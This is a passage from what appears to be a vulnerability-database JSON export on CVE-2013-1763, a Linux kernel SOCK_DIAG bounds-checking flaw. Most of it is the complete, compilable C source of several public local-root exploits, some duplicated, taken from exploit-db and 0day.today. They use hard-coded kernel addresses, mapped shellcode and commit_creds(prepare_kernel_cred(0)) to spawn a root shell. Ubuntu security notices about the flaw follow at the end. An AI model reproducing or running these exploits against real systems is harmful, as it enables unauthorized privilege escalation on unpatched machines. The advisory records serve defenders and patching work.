saveme() {\r\n\tasm(\r\n\t\"movq %%cs, %0\\n\"\r\n\t\"movq %%ss, %1\\n\"\r\n\t\"pushfq\\n\"\r\n\t\"popq %2\\n\"\r\n\t: \"=r\" (user_cs), \"=r\" (user_ss), \"=r\" (user_rflags) : : \"memory\" \t\t);\r\n}\r\n\r\nvoid shell(void) {\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n\r\n\texit(0);\r\n}\r\n\r\nstatic void restore() {\r\n\tasm volatile(\r\n\t\"swapgs ;\"\r\n\t\"movq %0, 0x20(%%rsp)\\t\\n\"\r\n\t\"movq %1, 0x18(%%rsp)\\t\\n\"\r\n\t\"movq %2, 0x10(%%rsp)\\t\\n\"\r\n\t\"movq %3, 0x08(%%rsp)\\t\\n\"\r\n\t\"movq %4, 0x00(%%rsp)\\t\\n\"\r\n\t\"iretq\"\r\n\t: : \"r\" (user_ss),\r\n\t \"r\" ((unsigned long)0x36000000),\r\n\t \"r\" (user_rflags),\r\n\t \"r\" (user_cs),\r\n\t \"r\" (shell)\r\n\t);\r\n}\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\trestore();\r\n\t\r\n\treturn -1;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n\tint fd;\r\n\r\n\tstruct sock_diag_handler {\r\n\t\t__u8 family;\r\n\t\tint (*dump)(void *a, void *b);\r\n\t};\r\n\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tvoid *mapped;\r\n\tvoid *fakestruct;\r\n\tstruct sock_diag_handler a;\r\n\ta.dump = (void *)0xffffffff8100b74f;\r\n\r\n\tcommit_creds = (_commit_creds) 0xffffffff8107ee30;\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107f0c0;\r\n\r\n\tassert((fakestruct = mmap((void *)0x10000, 0x10000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE, 0, 0)) == (void*)0x10000);\r\n\tmemcpy(fakestruct+0xad38, &a, sizeof(a));\r\n\r\n\tassert((mapped = mmap((void*)0x35000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_POPULATE|MAP_FIXED|MAP_GROWSDOWN, 0, 0)) == (void*)0x35000000);\r\n\r\n\tunsigned long *fakestack = (unsigned long *)mapped;\r\n\t*fakestack ++= 0xffffffff01661ef4;\r\n\tint p;\r\n\tfor (p = 0; p < 0x1000000; p++)\r\n\t\t*fakestack ++= 0xffffffff8100ad9eUL;\r\n\t\r\n\tfakestack = (unsigned long *)(mapped + 0x7000000);\r\n\tprintf(\"[+] fake stack addr = %lx\\n\", (long unsigned)fakestack);\r\n\t*fakestack ++= 0xffffffff8133dc8fUL;\r\n\t*fakestack ++= 0x407e0;\r\n\t*fakestack ++= 0xffffffff810032edUL;\r\n\t*fakestack ++= 0xdeadbeef;\r\n\t*fakestack ++= (unsigned long)kernel_code; // transfer control to our usual shellcode\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\treq.r.sdiag_family = 45;\r\n\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\tsaveme();\r\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\r\n\t\tprintf(\"bad send\\n\");\r\n\t\tclose(fd);\r\n\t\treturn -1;\r\n\t}\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44299/"}, {"lastseen": "2016-02-03T18:58:07", "description": "Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit. CVE-2013-1763. Local exploit for linux platform", "published": "2013-02-24T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.3 < 3.8 - SOCK_DIAG Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-24T00:00:00", "id": "EDB-ID:33336", "href": "https://www.exploit-db.com/exploits/33336/", "sourceData": "/* \r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by SynQ\r\n* \r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n* \r\n* Fedora 18 support added\r\n* \r\n* 2/2013\r\n*/\r\n\r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nint jump_payload_not_used(void *skb, void *nlh)\r\n{\r\n\tasm volatile (\r\n\t\t\"mov $kernel_code, %eax\\n\"\r\n\t\t\"call *%eax\\n\"\r\n\t);\r\n}\r\n\r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n\tFILE *f;\r\n\tunsigned long addr;\r\n\tchar dummy, sym[512];\r\n\tint ret = 0;\r\n \r\n\tf = fopen(\"/proc/kallsyms\", \"r\");\r\n\tif (!f) {\r\n\t\treturn 0;\r\n\t}\r\n \r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sym);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sym)) {\r\n\t\t\tprintf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\tfclose(f);\r\n \r\n\treturn 0;\r\n}\r\n\r\nint main(int argc, char*argv[])\r\n{\r\n\tint fd;\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\tchar\tbuf[8192];\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\t//req.r.sdiag_family = 89;\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\tif(argc==1){\r\n\t\tprintf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\r\n\t\treturn 0;\r\n\t}\r\n\telse if(strcmp(argv[1],\"Fedora\")==0){\r\n\t commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\r\n\t prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\r\n\t sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\r\n\t nl_table = get_symbol(\"nl_table\");\r\n\t \r\n\t if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\r\n\t\tprintf(\"some symbols are not available!\\n\");\r\n\t\texit(1);\r\n\t\t}\r\n\r\n\t family = (nl_table - sock_diag_handlers) / 4;\r\n\t printf(\"family=%d\\n\",family);\r\n\t req.r.sdiag_family = family;\r\n\t \r\n\t if(family>255){\r\n\t\tprintf(\"nl_table is too far!\\n\");\r\n\t\texit(1);\r\n\t\t}\r\n\t}\r\n\telse if(strcmp(argv[1],\"Ubuntu\")==0){\r\n\t commit_creds = (_commit_creds) 0xc106bc60;\r\n\t prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n\t req.r.sdiag_family = 81;\r\n\t}\r\n\r\n\tunsigned long mmap_start, mmap_size;\r\n\tmmap_start = 0x10000;\r\n\tmmap_size = 0x120000;\r\n\tprintf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n\r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n\tmemset((void*)mmap_start, 0x90, mmap_size);\r\n\r\n\tchar jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\r\n\tunsigned long *asd = &jump[4];\r\n\t*asd = (unsigned long)kernel_code;\r\n\r\n\tmemcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n\r\n\tif ( send(fd, &req, sizeof(req), 0) < 0) {\r\n\t\tprintf(\"bad send\\n\");\r\n\t\tclose(fd);\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tprintf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/33336/"}, {"lastseen": "2016-02-02T23:31:39", "description": "Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers[] Local Root. CVE-2013-1763. Local exploit for linux platform", "published": "2013-02-27T00:00:00", "type": "exploitdb", "title": "Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers Local Root", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-02-27T00:00:00", "id": "EDB-ID:24555", "href": "https://www.exploit-db.com/exploits/24555/", "sourceData": "// archer.c\r\n//\r\n// 2012 sd@fucksheep.org\r\n//\r\n// Works reliably against x86-64 3.3-3.7 arch.\r\n//\r\n// Tested against:\r\n//\r\n// Linux XXX 3.3.1-1-ARCH #1 SMP PREEMPT Tue Apr 3 06:46:17 UTC 2012 x86_64 GNU/Linux\r\n// Linux XXX 3.4.7-1-ARCH #1 SMP PREEMPT Sun Jul 29 22:02:56 CEST 2012 x86_64 GNU/Linux\r\n// Linux XXX 3.7.4-1-ARCH #1 SMP PREEMPT Mon Jan 21 23:05:29 CET 2013 x86_64 GNU/Linux\r\n// ...\r\n\r\n#include <assert.h>\r\n\r\n#define JUMP 0x0000100000001000LL\r\n#define BASE 0x380000000\r\n#define SIZE 0x010000000\r\n#define KSIZE 0x2000000\r\n\r\nstatic long ugid;\r\n\r\nvoid patch_current() {\r\n int i,j,k;\r\n char *current = *(char**)(((long)&i) & (-8192));\r\n long kbase = ((long)current)>>36;\r\n\r\n for (i=0; i<4000; i+=4) {\r\n long *p = (void *)&current[i];\r\n int *t = (void*) p[0];\r\n if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;\r\n for (j=0; j<20; j++) {\r\n for (k = 0; k < 8; k++)\r\n if (((int*)&ugid)[k%2] != t[j+k]) goto next;\r\n for (i = 0; i < 8; i++) t[j+i] = 0;\r\n for (i = 0; i < 10; i++) t[j+9+i] = -1;\r\n return;\r\nnext:; }\r\n }\r\n}\r\n\r\n\r\nint main()\r\n{\r\n long u = getuid();\r\n long g = getgid();\r\n int i, f = socket(16,3,4);\r\n static int n[10] = {40,0x10014,0,0,45,-1};\r\n\r\n assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);\r\n\r\n setresuid(u,u,u); setresgid(g,g,g);\r\n ugid = (g<<32)|u;\r\n\r\n memcpy(1<<12, &patch_current, 1024);\r\n for (i = 0; i < (1<<17); i++) ((void**)(1<<12))[i] = &patch_current;\r\n send(f, n, sizeof(n), 0);\r\n setuid(0);\r\n return execl(\"/bin/bash\", \"-sh\", 0);\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24555/"}, {"lastseen": "2016-02-02T23:56:13", "description": "Ubuntu 12.10 - (64-Bit) sock_diag_handlers - Local Root Exploit. CVE-2013-1763. Local exploit for lin_x86-64 platform", "published": "2013-03-13T00:00:00", "type": "exploitdb", "title": "Ubuntu 12.10 - 64-Bit sock_diag_handlers - Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-13T00:00:00", "id": "EDB-ID:24746", "href": "https://www.exploit-db.com/exploits/24746/", "sourceData": "#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n\r\nint __attribute__((regparm(3)))\r\nx()\r\n{\r\n\tcommit_creds(prepare_kernel_cred(0));\r\n\treturn -1;\r\n}\r\n\r\nchar stage1[] = \"\\xff\\x25\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n\r\nint main() {\r\n\tint fd;\r\n unsigned long mmap_start, mmap_size = 0x10000;\r\n\tunsigned family;\r\n\tstruct {\r\n\t\tstruct nlmsghdr nlh;\r\n\t\tstruct unix_diag_req r;\r\n\t} req;\r\n\tchar\tbuf[8192];\r\n\r\n\tif ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n\t\tprintf(\"Can't create sock diag socket\\n\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(&req, 0, sizeof(req));\r\n\treq.nlh.nlmsg_len = sizeof(req);\r\n\treq.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n\treq.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n\treq.nlh.nlmsg_seq = 123456;\r\n\r\n\treq.r.udiag_states = -1;\r\n\treq.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n\r\n\t/* Ubuntu 12.10 x86_64 */\r\n\treq.r.sdiag_family = 0x37;\r\n\tcommit_creds = (_commit_creds) 0xffffffff8107d180;\r\n\tprepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;\r\n mmap_start = 0x1a000;\r\n\r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n\t\tMAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n\r\n\t\tprintf(\"mmap fault\\n\");\r\n\t\texit(1);\r\n }\r\n\r\n *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;\r\n memset((void *)mmap_start, 0x90, mmap_size);\r\n memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));\r\n\r\n\tsend(fd, &req, sizeof(req), 0);\r\n\tif(!getuid())\r\n\t\tsystem(\"/bin/sh\");\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24746/"}], "ubuntu": [{"lastseen": "2020-07-09T01:38:30", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "USN-1751-1", "href": "https://ubuntu.com/security/notices/USN-1751-1", "title": "Linux kernel (OMAP4) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:41:28", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-26T00:00:00", "published": "2013-02-26T00:00:00", "id": "USN-1749-1", "href": "https://ubuntu.com/security/notices/USN-1749-1", "title": "Linux kernel (Quantal HWE) vulnerability", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:23:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1763"], "description": "Mathias Krause discovered a bounds checking error for netlink messages \nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit \nthis flaw to crash the system or run programs as an administrator.", "edition": 5, "modified": "2013-02-26T00:00:00", "published": "2013-02-26T00:00:00", "id": "USN-1750-1", "href": "https://ubuntu.com/security/notices/USN-1750-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-10T04:12:50", "description": "Local root exploit for Ubuntu 12.10 64bit that leverages the sock_diag_handlers[] vulnerability in Linux kernels before 3.7.10.", "edition": 2, "published": "2013-03-13T00:00:00", "type": "zdt", "title": "Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2013-03-13T00:00:00", "id": "1337DAY-ID-20499", "href": "https://0day.today/exploit/description/20499", "sourceData": "#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n \r\nint __attribute__((regparm(3)))\r\nx()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nchar stage1[] = \"\\xff\\x25\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\";\r\n \r\nint main() {\r\n int fd;\r\n unsigned long mmap_start, mmap_size = 0x10000;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n \r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n \r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n \r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n \r\n /* Ubuntu 12.10 x86_64 */\r\n req.r.sdiag_family = 0x37;\r\n commit_creds = (_commit_creds) 0xffffffff8107d180;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;\r\n mmap_start = 0x1a000;\r\n \r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n \r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n \r\n *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;\r\n memset((void *)mmap_start, 0x90, mmap_size);\r\n memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));\r\n \r\n send(fd, &req, sizeof(req), 0);\r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n}\n\n# 0day.today [2018-03-10] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/20499"}, {"lastseen": "2018-03-09T23:28:33", "edition": 2, "description": "Exploit for linux platform in category local exploits", "published": "2014-05-17T00:00:00", "type": "zdt", "title": "Linux Kernel 3.3-3.8 - SOCK_DIAG Local Root Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1763"], "modified": "2014-05-17T00:00:00", "id": "1337DAY-ID-22258", "href": "https://0day.today/exploit/description/22258", "sourceData": "/*\r\n* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8\r\n* bug found by Spender\r\n* poc by SynQ\r\n*\r\n* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux\r\n* using nl_table->hash.rehash_time, index 81\r\n*\r\n* Fedora 18 support added\r\n*\r\n* 2/2013\r\n*/\r\n \r\n#include <unistd.h>\r\n#include <sys/socket.h>\r\n#include <linux/netlink.h>\r\n#include <netinet/tcp.h>\r\n#include <errno.h>\r\n#include <linux/if.h>\r\n#include <linux/filter.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <linux/sock_diag.h>\r\n#include <linux/inet_diag.h>\r\n#include <linux/unix_diag.h>\r\n#include <sys/mman.h>\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n_commit_creds commit_creds;\r\n_prepare_kernel_cred prepare_kernel_cred;\r\nunsigned long sock_diag_handlers, nl_table;\r\n \r\nint __attribute__((regparm(3)))\r\nkernel_code()\r\n{\r\n commit_creds(prepare_kernel_cred(0));\r\n return -1;\r\n}\r\n \r\nint jump_payload_not_used(void *skb, void *nlh)\r\n{\r\n asm volatile (\r\n \"mov $kernel_code, %eax\\n\"\r\n \"call *%eax\\n\"\r\n );\r\n}\r\n \r\nunsigned long\r\nget_symbol(char *name)\r\n{\r\n FILE *f;\r\n unsigned long addr;\r\n char dummy, sym[512];\r\n int ret = 0;\r\n \r\n f = fopen(\"/proc/kallsyms\", \"r\");\r\n if (!f) {\r\n return 0;\r\n }\r\n \r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **) &addr, &dummy, sym);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sym);\r\n continue;\r\n }\r\n if (!strcmp(name, sym)) {\r\n printf(\"[+] resolved symbol %s to %p\\n\", name, (void *) addr);\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n fclose(f);\r\n \r\n return 0;\r\n}\r\n \r\nint main(int argc, char*argv[])\r\n{\r\n int fd;\r\n unsigned family;\r\n struct {\r\n struct nlmsghdr nlh;\r\n struct unix_diag_req r;\r\n } req;\r\n char buf[8192];\r\n \r\n if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){\r\n printf(\"Can't create sock diag socket\\n\");\r\n return -1;\r\n }\r\n \r\n memset(&req, 0, sizeof(req));\r\n req.nlh.nlmsg_len = sizeof(req);\r\n req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;\r\n req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;\r\n req.nlh.nlmsg_seq = 123456;\r\n \r\n //req.r.sdiag_family = 89;\r\n req.r.udiag_states = -1;\r\n req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;\r\n \r\n if(argc==1){\r\n printf(\"Run: %s Fedora|Ubuntu\\n\",argv[0]);\r\n return 0;\r\n }\r\n else if(strcmp(argv[1],\"Fedora\")==0){\r\n commit_creds = (_commit_creds) get_symbol(\"commit_creds\");\r\n prepare_kernel_cred = (_prepare_kernel_cred) get_symbol(\"prepare_kernel_cred\");\r\n sock_diag_handlers = get_symbol(\"sock_diag_handlers\");\r\n nl_table = get_symbol(\"nl_table\");\r\n \r\n if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){\r\n printf(\"some symbols are not available!\\n\");\r\n exit(1);\r\n }\r\n \r\n family = (nl_table - sock_diag_handlers) / 4;\r\n printf(\"family=%d\\n\",family);\r\n req.r.sdiag_family = family;\r\n \r\n if(family>255){\r\n printf(\"nl_table is too far!\\n\");\r\n exit(1);\r\n }\r\n }\r\n else if(strcmp(argv[1],\"Ubuntu\")==0){\r\n commit_creds = (_commit_creds) 0xc106bc60;\r\n prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;\r\n req.r.sdiag_family = 81;\r\n }\r\n \r\n unsigned long mmap_start, mmap_size;\r\n mmap_start = 0x10000;\r\n mmap_size = 0x120000;\r\n printf(\"mmapping at 0x%lx, size = 0x%lx\\n\", mmap_start, mmap_size);\r\n \r\n if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,\r\n MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {\r\n printf(\"mmap fault\\n\");\r\n exit(1);\r\n }\r\n memset((void*)mmap_start, 0x90, mmap_size);\r\n \r\n char jump[] = \"\\x55\\x89\\xe5\\xb8\\x11\\x11\\x11\\x11\\xff\\xd0\\x5d\\xc3\"; // jump_payload in asm\r\n unsigned long *asd = &jump[4];\r\n *asd = (unsigned long)kernel_code;\r\n \r\n memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));\r\n \r\n if ( send(fd, &req, sizeof(req), 0) < 0) {\r\n printf(\"bad send\\n\");\r\n close(fd);\r\n return -1;\r\n }\r\n \r\n printf(\"uid=%d, euid=%d\\n\",getuid(), geteuid() );\r\n \r\n if(!getuid())\r\n system(\"/bin/sh\");\r\n \r\n}\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22258"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1763"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1750-1\r\nFebruary 26, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n\r\nSummary:\r\n\r\nThe system could be made to crash or run programs as an administrator.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nBrad Spengler discovered a bounds checking error for netlink messages\r\nrequesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit\r\nthis flaw to crash the system or run programs as an administrator.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n linux-image-3.5.0-25-generic 3.5.0-25.39\r\n 